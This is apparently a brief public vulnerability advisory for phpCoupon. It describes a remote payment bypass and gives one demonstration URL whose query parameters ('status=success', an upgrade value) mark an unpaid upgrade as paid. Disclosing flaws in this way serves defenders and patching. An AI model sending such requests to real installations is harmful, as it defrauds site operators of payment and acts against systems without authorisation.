phpCoupon Remote Payment Bypass Vulnerability

phpCoupon Remote Payment Bypass Vulnerability

Attackers use a browser to exploit this issue.

The following URI demonstrates this issue:

http://www.example.com/path/user.php?REQ=auth&billing=141&status=success&custom=upgrade5

The '141' and the 'upgrade5' values may vary from installation to installation.